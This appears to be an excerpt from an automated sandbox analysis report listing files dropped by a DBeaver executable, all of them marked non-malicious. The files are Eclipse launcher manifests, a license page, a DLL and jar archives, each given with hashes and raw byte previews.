      SHA1:ADBE4E92433DBD7CA7091F5813EFFDAE7A0C9F49
      SHA-256:FC1C216CCBD1A123DCF6CE87A50C604E1BC5687D816621684EBD5EF6878F69B2
      SHA-512:6C4D01681EB5DB802B8C62349D88B1A9FB6880D2BEC4546200887DF9C1BCACE8AFE7C37B34ED48CBD1D2083BAF6148390624B5281C9595DFF214D1D6E34BA4EC
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):508
      Entropy (8bit):5.84335595990348
      Encrypted:false
      SSDEEP:
      MD5:B59187830F363D09DA3AA8DEA03B3B90
      SHA1:9A6151C62C5E34FA87EDAF166EC84917568F3B30
      SHA-256:0A6E77DC949924085008544133DDFA91377759DAC9C3544BB1BF835548E5426A
      SHA-512:FE5AFE4EA32086C3E341153B53283C8CD71A4C06A266C19060245BA36B48CBAD0DF78CCEC75BB51E80A82ECB9DB36BD5B8B50B51A83A9CD5F8B945DAE35C53E5
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: osahGPIfwXh4/ICjGV0HhNnH26GO+2JxWbtUe1P19Ss=..SHA-256-Digest-Manifest-Main-Attributes: XiG+Tr2ELu+Yi5gmm1CTESOj4ZP9WW6.. /UfLVZ9BM9xs=....Name: about.html..SHA-256-Digest: ncO+WCNUIJ0JLCOl/ot53yopwTqvvtVu0qSgblesdYo=....Name: eclipse_11802.dll..SHA-256-Digest: F9XMI88Y6W4PrH01pGPrEdG9+tHcd5sgR9eX2qQCFYY=....Name: launcher.win32.win32.x86_64.properties..SHA-256-Digest: PNV5cIdVFdcJvoEZaHaJW+hoawjIP/jj+uGrHGf2W24=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1032
      Entropy (8bit):5.617793761200461
      Encrypted:false
      SSDEEP:
      MD5:3BDFD6891D4D9C78315C00B3F5D8EAFB
      SHA1:6FA67CF39DCFA8B847449230E8FC1BC9E492DDC3
      SHA-256:A2C6A118F21FC17878FC80A3195D0784D9C7DBA18EFB627159BB547B53F5F52B
      SHA-512:63C8D14B6BD127A8650B077476CE22E81694927B86FF5C671472D802E25CE67404CC71B899A284B5F327ABAE5EB2BC310E7EF76F5F534D53469C291F180B161D
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: %pluginName..Bundle-Vendor: %providerName..Bundle-SymbolicName: org.eclipse.equinox.launcher.win32.win32.x86_64;sin.. gleton:=true..Bundle-Version: 1.2.800.v20231003-1442..Fragment-Host: org.eclipse.equinox.launcher;bundle-version="[1.5.0,1.7.0.. )"..Eclipse-PlatformFilter: (& (osgi.ws=win32) (osgi.os=win32) (osgi.arch=x8.. 6_64))..Bundle-Localization: launcher.win32.win32.x86_64..Eclipse-BundleShape: dir..Eclipse-SourceReferences: scm:git:https://github.com/eclipse-equinox/equ.. inox.git;path="bundles/org.eclipse.equinox.launcher.win32.win32.x86_64".. ;tag="I20231004-0320";commitId=ad90b69a38b821d263ad5a103626bb198db6a288....Name: about.html..SHA-256-Digest: 7mbS+ztMDS7S5/aYvJ7U49bPd/pcr0CtAylhJdsaxfA=....Name: eclipse_11802.dll..SHA-256-Digest: gNe5bATErxGtBEq8msKRsA/3pS75BvaKhBVfvtAwxUU=....Name: launcher.win32.win32.x86_64.properties..SHA-256-Digest: woVtUghzXrga4udy
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):1460
      Entropy (8bit):5.143993744011059
      Encrypted:false
      SSDEEP:
      MD5:6A662193D36153B613D4B8C23A8A1921
      SHA1:BA20EBF93E8C0F843D0585E22A75CFEBC2C66091
      SHA-256:EE66D2FB3B4C0D2ED2E7F698BC9ED4E3D6CF77FA5CAF40AD03296125DB1AC5F0
      SHA-512:40BEE5BA55119CDDB56D413A5DAC7DADE93A76FC1EA83BAB1FA6DFBA61593A5823D22A735ED4B4230DBA2C17BBDFC1E61473D8BC94181A6D920B7BB90F9F2AED
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />.<title>About</title>.</head>.<body lang="EN-US">..<h2>About This Content</h2>...<p>November 30, 2017</p>..<h3>License</h3>...<p>...The Eclipse Foundation makes available all content in this plug-in...(&quot;Content&quot;). Unless otherwise indicated below, the Content...is provided to you under the terms and conditions of the Eclipse...Public License Version 2.0 (&quot;EPL&quot;). A copy of the EPL is...available at <a href="http://www.eclipse.org/legal/epl-2.0">http://www.eclipse.org/legal/epl-2.0</a>....For purposes of the EPL, &quot;Program&quot; will mean the Content...</p>...<p>...If you did not receive this Content directly from the Eclipse...Foundation, the Content is being redistributed by another party...(&quot;Redistributor&quot;) and diffe
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):244104
      Entropy (8bit):6.383211679217303
      Encrypted:false
      SSDEEP:
      MD5:0ECFED5E2096F6BE689F7AA887347BBD
      SHA1:78A1334037BBE600C5E006E6FC07789E16451C4A
      SHA-256:80D7B96C04C4AF11AD044ABC9AC291B00FF7A52EF906F68A84155FBED030C545
      SHA-512:0C94DB025625B933B94004E06BD7C09580574D824DE1AA60101ADAE7F9E460BB47CCBDB246FE11184CF34D0143276035FB1232B834D206643C41DA5928A03F9A
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m..w...w...w.......w.......w......rw.......w.......w.......w.......w...w..Jw.......w.......w.......w..Rich.w..........................PE..d...B..e.........." .....t.....................@....................................G.....`..........................................A..p...PD.................. ........)......P.......................................8...............H............................text....t.......t.................. ..`.rdata...............x..............@..@.data...(>...`...*...<..............@....pdata.. ........ ...f..............@..@_RDATA..............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):634
      Entropy (8bit):4.45406949278573
      Encrypted:false
      SSDEEP:
      MD5:BE848C23262AF1E0E85447ADFD595E4F
      SHA1:4D813567D6578F4B2294416D8DBDB86CE9FDC122
      SHA-256:C2856D5208735EB81AE2E7720E7BF8A7A69BEB73B3E17288FC93BCF6C729AF8F
      SHA-512:842F429493B805E455BF8906316DF7A03C033AA23EC848D10DFCC8B991D7661CF9E64BF068D2929E89CCBB11FAC3ACB1122D786187F87E1AEF92FC2F4FC11793
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2007, 2009 IBM Corporation and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# IBM Corporation - initial API and implementation.###############################################################################.pluginName = Equinox Launcher Win32 X86_64 Fragment.providerName = Eclipse.org - Equinox.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):55881
      Entropy (8bit):7.949024298687738
      Encrypted:false
      SSDEEP:
      MD5:C33099156E237C999CF01E15A6E75DF3
      SHA1:18F736891B70D41A5322231E5C3CFC0BFFAFB1F3
      SHA-256:F88EEEA34C9B7F5D117B54A5285E0BE4AA6815CC7226DF0DDA43B37516752FDC
      SHA-512:AD41FC78EA66F75C05C985159B6A80D3BDCE4EFB424A06F2F5F20A1D83B5688526306027264BADA27673EA3A39C9E5FB59B59C7D77C6BB72C508F8E390D5429F
      Malicious:false
      Reputation:unknown
      Preview:PK........@.fW................META-INF/MANIFEST.MF.V..H.}7..0*z..d.A....T\K..^&.H .21Ip...Z........9..{.&c...../!M....T...6..A.o...1. .5....R....b......N..1..m..?...b^!....D.Q.+.S....u.<E.....A.W.v.....>E...!H..Cz. .........$.eU..,..I.U^..j.0.....$....K..X..z...9.~.{~.L.......^....G..Fi.2`.T.]7...Bt..9.7.bA?.2.....~..&...?..3H1._.....b..*.-.;..9G.yC..L....m~L..Z..rm/+.IRj.9t!..y..;jx.5|..!..o?.r........3...9.......gS..+..{...;.C7.-^...s..1.yP.&;.jk...J.T..V.vT...XQ,.I.[,..W.o..o.......a8y. ...d_z.X0.M^..|.y..h....K~v..2.I..9......U;.58k..AR=m...ERV.Y....+.y..<Uz.;.k.....2.7.d..t.u..._ky....6....%...i.L..r..xr.4.$\U..y5...~.j3/.3..6.....f...}p..M/9.....<..&.v@6.m]....H.R.#..N..u..y.....&6E..@..;...q.R.N......a...P.T.h......9L..]Q......--XZ{..q1[..X.].X....E...knV.....t.........[\..8.F..O[.<......W.m..X..<...d..V.^...e..n.+.mM$m.......-.<...h......1-.w......K.....e_i.F....S...*{..;.d.j...9UuK.-......B...7...v....X.._.+2.....b..1.....N..~.{.f.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):176327
      Entropy (8bit):7.913917066051493
      Encrypted:false
      SSDEEP:
      MD5:AE68914D09F54D82BEED8B7539B60AEF
      SHA1:1179A9F4702BEBC50840E578D020EDD8A98580E8
      SHA-256:9E5AAE0BA887A5959B74D06751D4DF2D1441B326AE9E28A80C1781FAAA810835
      SHA-512:E519AA6630D00A377151D8ABEE12E7FFE044F602BC3DF77A2AE907A29A1CC9A67B1A9A94733DD36191119896BC317CE502A294448606C330CB1905EC67D8D460
      Malicious:false
      Reputation:unknown
      Preview:PK.........eW................META-INF/MANIFEST.MF.[Y....OU.CW*..+....L*.(..(..x..b..2.....=...N...f.g..Y."..iv..$u......}.2J....zX......WTb:n..+..w._...[.3..c`.......p+.^$r.k......b?..........w..Qbw..q.....at..HWO2w..Y7.q..Y..?S7.}.E_.\.?~eI. ..LX......CP..a.0....Qf..z-...0.I..-...Y.}+.b..j..'N..@..|d.[....:.~aNq.d.nz......{. m4..t..A\...._..R..Q.....Z...(....j.~{q.+.jI..].........(........jI..F.[`a.Fw.n..AV..}.md.v....t....9......n7..........^D..ct.....U[.%..B..A........s.......xG=3.FO..{.TY...l.`.;....i..x...>x......t..zw..c.-...zB.1.:M.t.&.......V...S=..........~....u^..OO.....&U.n#..*...5..=.=....yFk.....[.7..x..nM....~..{...../..3..(.i........_.....?.n.).W...y.`.iV...Q.2....g.WK..2.=U.v..h.W.f...l....{.j..I.n+...Y.z...k....B...%]=_.7A...>y...|y..0...|&.mq\.i]....{S.a......5..7.j.y......_.z...(..$......./S...z~..~|g.&..~.'.....Z../|Mp...g.....mn.\~..oI..Q.j.p..2.e.;+..:3.'kI.{...7......E....m.l..;Ti.><WKz.....MkI.x.>....5.>U?:.G$....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):31932
      Entropy (8bit):7.9299671640184535
      Encrypted:false
      SSDEEP:
      MD5:2CB9400C2914ADB44C7C41AF45E30911
      SHA1:994AA74923C3BBE261183AC14FD14C416AD25384
      SHA-256:320D705E1BA0DDA823FEF4EBC7338834F85787CF79EACD3A45CC6F8D3522922C
      SHA-512:81356C2164435C1BDA95BC8929BCAD8CE098FAA0CB3108D69768BF354E0656C9202F8CC4317E93EA8217E0F7354AA799A5DEA5C531A41B3A7FC58D6E9929A3CF
      Malicious:false
      Reputation:unknown
      Preview:PK........*26W................META-INF/MANIFEST.MF.V.n.:.}G....~8js....(.VZ M..<.9..>$v.8.......].. .g.5k.a..^..K/....zN..l......zn."Dr-.W8B,W..qD;.-..d...X%~Fl.I.#gJ..G..C../...L....,.bx....t.. .......2.$..j..8...Y.Nrf. .*G.....I..ii\.r..N.e%L8b..g.r.9.#v...g4.6b..<P.\..<..`8..n}.4.p..+>/.7..a.............A...|?.f2.#...[..8...0..C..sC...+...x.M.!y.\_T..,X$w!>.R.......N3.b.IG...uY...B..O....Qf....L_.=..8..-^..L.....A..oa.n.].C>..(..R0}.,....@.Q?..wX..-I$a..B...K&..e..~.h-.......e.7.`.yrs>S..E.......dg......>.}L..[>aS..x7.V..4P\...E.M.q&....l...J.../...GI.:0....0..Z!......a:M...b...$.....Z"..DA=.@..`^_q..uE..W.......#."..e...._5....k.|......SX.....)....n..f.rE.j...B.m...,.R.i......^.f..._`..+...oIz.,.aG,.z..Y....QR.<.V.b............[.wFa.dX9.>...\9.Q.(..d.d. ...8U].4.w.cR.l...nV...ou.k0.YpU.......tM.....h...T.[..u.(M,......{.U......a5..Y.q....C..f4.p........+.F.(.Z.3...uX-<.?.5...#.. ..I.9$t..k...J...<...v3y..p...'.....Z..{.^....6.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):82587
      Entropy (8bit):7.844540460968372
      Encrypted:false
      SSDEEP:
      MD5:657544F3A6EFFAF668F74228650D8148
      SHA1:9597CB95AF877E41F705956277ABB7B6FDEAC78B
      SHA-256:0D203FEB6225F030FF75B8D6F273360E3F1118BB58C29591117BB84D38866C42
      SHA-512:5011C6CFEA034B9E9E948FB6FE60939E154422C09B45A8AF51619DBA4FCDF478111A8A59D507F4EEB727AB11DAA88A5522A2035D760ED7E29AB7AAEF6073FBA3
      Malicious:false
      Reputation:unknown
      Preview:PK.........bW................META-INF/MANIFEST.MF.ZIs....wD......... ......HHh..]|..4......p....v.W....2O.,Z0"..y.0.Y......D...d.(...?<....DwTfy..dwD.....~`?........V./... <.|5..~..!x..O....U..~Q........3....Or..i.G..M+........."+.,.m...&...-..........W e...(...}...Yd./.6_.g[Ev..?I.o}.d.....G.8y.t....}.g.dX..9..[..?8..7....?/......$.......5q.@..><.....-]8....F....>...d....].m.;..f./..].%.Y.;.U4..C..7y..p.W<....<>....t/...[q..........\...M#I....'.ag.Vua..x...a. .%...L...}...(...U:~.......05.8.........w..Q!(..(.z;/...=.....1...9.d.[1\..z.Xo..X.YU....v.'.....Y.-..E..7.|-..0..'..K.KbX........f.c...\).K.....r{s.{3..a.O...N`....6W`....r.>....8j..S.2#.+B..K%.[1..H4a..k.._.2..........h.r3..T..g..`O/..7z...Wo .Oq.5*<U.5....^...T.t..:K.......3.m.^../5~k...O.j...?."......bOL....N,....IL...d...Y..w.c....Y.AZ...5..?.....-.....r.%.6..VY%..m.,.BX.wcck(.......(U..*..8...S@..-.0...G...r..A...2..0..W@./..a..p.....u.q.2...:XF^..iZ...*..i.X...V.?.Q.&.._o..~B..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):69796
      Entropy (8bit):7.9573257508239825
      Encrypted:false
      SSDEEP:
      MD5:45807B8ABE10DCFBE71227FB1D5DA0C4
      SHA1:DC86146CEA3371B5D084CAF3F512239480DB6D09
      SHA-256:115E9798CFA6DE82E0E9EC4F023D91CB4094DD7183D10A9CA3CDAA1D0E008CDE
      SHA-512:B596B358A892AC646A214DF011E10017CDE11A9E053AB59AE75B05B18204000BFD0362C6C8E38E230F9B69DA51E211F3E924ACF7F16252AA1A9B06BC8BF1AB12
      Malicious:false
      Reputation:unknown
      Preview:PK..........cW................META-INF/MANIFEST.MF.W.r...}OU..J..p.-.(..<x..x'h.<.j.U..Nw...F..Q......c.y...@..R..@Bm..SYA.......2.....T..+;.$%........ke:...049LM.!....H.;~....S.a7X.(y8~."..]..[.d)@.1..|.l.o...,.@..D..?R.-]..'F.O./..BN..0'..lV.3R)W:.ULf...]vg#....w.....#....0.C..$..o.....~...b......X^.....m..S...u........^f4}....W..3...?Y(...yA...r.......B3H"h..&>. b.T..@kd.....n8L.....qt.....5.....(s..c....}I5...=.w5E.O.....a].9.g.O.om!.%.W.8...W...iHz%I...........Y$...8..Om......J.........U.].<\..h(.Op.).{.>.'@.;.3]....$.._..... ..`...o8.$.-&.&.O...U4v.B.|.....$N.t.....D.Dw...a....O..3..f.c.[.P$....=.L?%......O..O.....{|gA!.m......i......r&.SJ...C?......,/.O.......L......\.mo.....p...@dBZNQ.+/mV^1.iY...U`$SI<.f........zz.,*.@..#....q..u%U....d..m=..!..J.....S...jA..Y.`..E*....r...w..?4...?.U.V.. r.b..P.....8.v..Pz...*.\A...%...5.c..{..gy.a.H....n..REJ...n.H.<}..||2a.<..Q..-..^]S...faG..%ch..$R.U"w.(...2.W.a{...5...F-....5 .B._Z3P7E.x..$..P..nLZ
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):116057
      Entropy (8bit):7.9281684485331265
      Encrypted:false
      SSDEEP:
      MD5:67986B98DCED9836E75E54B0B2E7E701
      SHA1:883D4BAAD0BDE7F9F5C3660E10774E1A8BD70DF2
      SHA-256:1D355DE14DDB2C3A4493B2CC132C48128F095A76C16CDE39A8F3C79AD8C02774
      SHA-512:BD21E6EBA5B39938276B76861E850C8DDD80CFDD8DEF2F7EA3308E37E94405EEFB3DE05E883730E8625C4AFAA6A1E0CF4A86265564D7D9BDBBA5AF23789F93B4
      Malicious:false
      Reputation:unknown
      Preview:PK.........BVW................META-INF/MANIFEST.MF.YYs...~....T..[.2.&..............Q&._..........k....F2"o...=.i.......~....f.O..Q..I-.+A..u.....[x...m..%....Yd..-.e..D.^.F....I....7.!4...^(....+..t....$h..R`.q..y......#O.w).*k.(.wJ.F1.F.6..7:...%]W.E9H##......x.~yh./.Gv#.$.K...O....xG#?a{9../.*.....o87.}...C..^.1{...x.j.8..Ie...ES..W.=t.8.%...'6.Xq.>.a... ..i.x..Z.-..-...F.<~?..>.I...Y..j.>~...k.%]27.j..c.^..`.....X..(..jI.....v.E.).ZR..FP.....ODI`D.H..4..v......!JA.%^.....a.=./!.&.X.....F..j.?+o".....c...7.y.......]..k.......I.;u-....W......L>...T.*.....K.(.Q.. ........\hjB..nu9.........g.v/..8:1+./.....".......k.~."...v..........q.._.F....).......kI.......N.x...>c.Q]A....q..2vv.H...7.q.x.".%y.;.r...`...~...%.vJ-.....-.v...?..uwxy..."...l@.".dO...>9^...y.=AP..-.&?....Y".Raj......./Q.A.h.|......<i.9..sS..\..`4E...u..7.]tcX.F..",P.Q.."........^.\..-./.~J.o..5.^.u....dY.;C...d..9.....D...C..\..%.....sJQWs..K.8.<e~....j
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):34538
      Entropy (8bit):7.897771870786609
      Encrypted:false
      SSDEEP:
      MD5:C7C5332993C5E5C99F16D93D9AE4EBB3
      SHA1:8633D5C01A1DC5D53F586165FE75ED5F6EA9B68C
      SHA-256:58D8C00171D9EEF95B44D1C388DFD1607D807869134ECADE5CF4CB8D3ED31897
      SHA-512:5BC7FA84891BE0825836DB356185F404EB19A280F6AA2356228D34AC28472F975EB8BC63E5223A28B39E6A94EC0171C3F8ADC00C56E962655925F5D4F31D8B10
      Malicious:false
      Reputation:unknown
      Preview:PK.........16W................META-INF/MANIFEST.MF.V.r.8.}OU...f..h..l.<.q....@.y..ea+..d.... .........G...E....b\.!.0...C.OO....<..7......0.....Z.........$AP.U.Z.H.<c.B...n@...?.0.q,_^.L..%!.{.B}...'..h..l..T=L...k.a.....".69?=)p.....d.......e.n.....]..*IQ.a..w.....o..A.y..8..P...\...].sDc..;\IE>..Ap..Q.....q^<..p"1.!..GI.c...R ....G..2..%....X~.H...1gH...g.>.l..y.ZU...+.*..9..S...g..8B1o.z ..G9.&.8...s....m~z.>.......@..I..RI..(.......!.H.P....K-_.#..8..&.1../.H..".>:KI..M]S..e....!zbJ....tU...1.y.3....F.....yg.d....]....v..a....gC.2..xI.O.H....Ee..oH.:@.|.2D3...a$.N...PE...ITc.[.-..gkB....T....F.......A....L9.D.Ce@.....f..}so.LHJ!....(..5..F...F.y...&....I{FV..5.,........VL.M..3...bw?.....FM.g..a...mdx.R5.z.Z.H.<.......2L....US8......I...(<=.t..iW...!.(...=\....m-......]{R..y.v....).....!.h^".^".i2..H.rh..Qk.1.Eh..|N..[U..0.#.mi.3g.....9...a......D.%.......vo...... .Xk. .Q.31.Ds9B..gZ.)...Y.gUj_....<A.......S..F..*.....L8.....rj....n.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):62614
      Entropy (8bit):7.886106147557411
      Encrypted:false
      SSDEEP:
      MD5:AA5320A1775356AC1F980D0D96C9F544
      SHA1:8727D6CB1570729237AEB07553E059CDF7363060
      SHA-256:681548F2988A894C478BF130646B13959ECFC92E524C793CF0773D237D773356
      SHA-512:5FFFC3357027BCD0A1A2E4D8BEA07D0A037B3BF7FB02B7E9E568A60BFD7BA327C7B4BE9E1E3175C3A89987A332193E7EF3A9E880D9906867F18623651CBFF8C9
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.X.r....w.....[.@..../..$@Lb.(I....J ....m.m.qo.w.T.'O...J...a..K.R/....}... .....{..`t.B... ...rG;.......@......`U{.@.........><].."4..3_...A3....>.8.%l..R3&,............S/r.~...../.e?q?.V.14];.4[.yV..4C...Y1.I....<+Y h.943L....8.a......t.Z...j..H....."...x.>..{y..X.F?.....k...'3.F...J0.t..).[S..8.p... .t....#..I.0Y...K.....9/wU'..s...C...w.@..<rh.....Z....k.^D..uW#..<.. ...N....w....I.9.......e6.3=..vA.......Fj;....G+.qH.U-..K....$g......2........}j.O...\....o73J{..A...E...d.3.v_.^s'.....g..."..z.vF..g.-..j.0@`....e...C.f..........#.h.......)......l..J.C:.Yk.......>ct.t.............m.2.................%.Kt._..$.`.2K.....gFl..q.j6..d+.2D..G..S...H.RG,.}.....c..<;.a.}.N:..N.(..(.......xdjW...h...bvx.D..X..Q:......`.)...`...a...y....Cc3_..........l..~/.W..|..5...@...85]...o.../....^v~....cGa.....-:..w<.#..F..P.Zb:..2.&Dx.R../.:1....J..5...V..;...w....9...B[....B.#...]....o..8..{..`.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):41051
      Entropy (8bit):7.834371159704515
      Encrypted:false
      SSDEEP:
      MD5:3377F22B25B8E8232D3558D5C041023E
      SHA1:72E3DBDEB268B41921D535314928AC95E29D4E36
      SHA-256:B02796810E6517BF3D5E430573C5EB2AC2E1B26A3CD05135057B4C315A251371
      SHA-512:3A262009EF27A4E43F26B91A87B6A8955A732862F4689AADC6D3FBFD59F00BE3017BAA252C158C90E280AF98E0D16CB30521D9A2550B9997BF23912F0299057D
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.XY..H.}....F.7O.....Q....(...2.$).....h....k....s.[^U@.w(I....L................#.j......Z..-w.3....>4.....W~.l.5.7..${[...=....v[..E<..[H.4..p..&.2.....M.'..,._..8.J...4..|..j24.<.4.9.o.4C....$....~[^.Fcd.s......G...GA.\...h.F..mc.z..!.Q3....u.>^..<......~;..P.^ly..cl..N=>...iC....... Eq...z.o.b\.M._.J._{... ...pz.."0.n.H.CU...($.NI|~.as.TI....y...U ...J.e|.HD....Y.....Z@..G....H..[.O......k%.^....../...B..V.3R..u...,.h.v(F.D.s-.....g7M...g7.J...d...* .\.......0..w...yy.nm.......V|.J...x..:.G.6..8d......w....6#p..{|x|.i~'H..|.v...Y.D...8.c...I...Mz...m..S....4gm'.^.-.q..s..N...i{.e.-.X..k&#...._..Q...._C..J...G..9_.k"*I{.]...[.h..Ton).*o..p......$..L.._..5EN..\.!..Yd(c2..Rg5N8...V..."..2<...Z.8....')E.X.Z..l.q........X03Vl...S.d...D.,...l....}..aSP...=.b1s..8O...9.S.....PU..l?..U#Teyyg...c..).~B..plwv....ce=.b:.g.......(.......o.....1......m...'C...H!f%..).4+[....O.yO.o..D...d5E^}.v..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):242752
      Entropy (8bit):7.932353565601458
      Encrypted:false
      SSDEEP:
      MD5:91F14DFCB221898AA2E868272F747B1F
      SHA1:129CA319DBF7EF8BEA7116AB97E382A6D084E604
      SHA-256:9E3BCA55BF55EDD70A897C9C8A5250D355B8EF005686D5EA81FF372F1E131A0F
      SHA-512:E1817D1578B21F36E516C5A6C986F6EFB8DD9C44D9756ED112A8500BE3B7433A6F75428832E46B16B4FC4550FA0FB7D526974A813803606857827B178116BB30
      Malicious:false
      Reputation:unknown
      Preview:PK.........eW................META-INF/MANIFEST.MF.[..H......NL..p...d....@T.d.E.... .,.......r....=u.U.YY..\...4..z.E.f._.G.....5+.y......M.....G...?b...Qu.;...=..k....]....D....O+3q...?y\.a:<.......}.....k.a^.....y..n.Os.....'.OU./4^.>....q..a.........H...f....i......{d..~.{./u.2....1t.....6.3..H.%.....YQ=H.......,......{~._..1....oW.....8v.^.?..Re..Y..C..c.eqy{p..v.g.\._...).....?........K;p.:v.$.dz..;.5X.m"NX...h.......S...y`.n..r...).p..boj...c..i...=...........;^..?..G.......[...AO.....y...0...a\.>\\..Y.d.U..eU......ng.....o..?...~D..?......0.....[P..7q)q+.1+.W=...R..q.z..&=.E.&nZ...3...<.B.'...J...Lc...nq.m...<K.Eu.>..........&..|........[.......cn.e...>..N..6.*v...Ms?..$..C..}..g.8Y.zn.[.<...*L........fQ..iW...._fE..K.<.....W.Y.I.....{=.,t.....>.........../..... .uS{..O..$.....{..6....2..o0.W.r......t.jfO.s.O._,.?g....x.eNO....Hsm.y.....f*......6.9t..._..'...x.._!.../...........<..f.|v./-|X.T...7)].......P.%..J.......%..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):38598
      Entropy (8bit):7.904511964549059
      Encrypted:false
      SSDEEP:
      MD5:CE96A9936364C6C8DB8EC51B39D58A64
      SHA1:47CBFB14E04CB686840935F60B11979C07E0DAB8
      SHA-256:E8E1E8F297740C0DEFBD476139215A8BBE84AC5AC7654AD85CBEC856EF226C18
      SHA-512:DDB90419E8CED648DB7303CD82EC53422C5C19D0340BEC72AD5DBA4F17723E22E9E8DF0A87A5931AD7857B9497E15DA848925C9EBB0E8A38E93097A31B7B3BC6
      Malicious:false
      Reputation:unknown
      Preview:PK........=c/W................META-INF/MANIFEST.MF.W.r.8.}OU.......xa1K*.f.;a.d..dY...e$...Gf.=.N.05O.}.Gw.m.c.q..#.1..1]...J....DqS.....1.A./....#.(....=O...%,.=.m.....2yz...*..$.a?.qz3.x.%..-(.)...p..E.}.V.......'......?#HH/.w.'.....e...)..Liy=.Hj..dgB..@Pv.-..b> ..+.Xz...<.vD.-`t.m.~8iKb......>..w.u@.Ht......T..:.0,..|....WB...>..1.f4.>.~.R2.....+.......]?z.Pb.......Rk...>AO.?S2C....)...m..W..`..>3$..dH...P.4.5.a........E!..K0.$.*.P....,~.......{..L`.@!..P.eml...%.F....!eHq.....K...1*g.......U.1......B7..r..1]@.....y.(Q*...d...(+ ..y.$.`=...Q....].$...?.$....&.#...........%.H...c..;..":.jy.oc:..f.($..o...%./.P>..Gl.!R"..zDG.IW....!N..|...'.d.@r,......XQ6?..}+G....I10.vx...)..[%.4d......!...^a.E.."..U......z.N...}sJ.....)...\.U..G.fO..n.K...Ih....v..u...@.d....G..:..t&..R..D..rI.H....bp.....G.T.~R.V.OZ.'QK....J...&......nP3...(...b.....%^...../..r.....X....<zm.R....>t..k*...t.V9s.>7.v2Z..tEn.v3..w..A......T...Bq.G>3f=k.... ;.`.l
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):27650
      Entropy (8bit):7.815373401821374
      Encrypted:false
      SSDEEP:
      MD5:B53E642910A0963390A1BF383F6EC1BB
      SHA1:D70F19BBA99C604DA10B25594CC467C66700667F
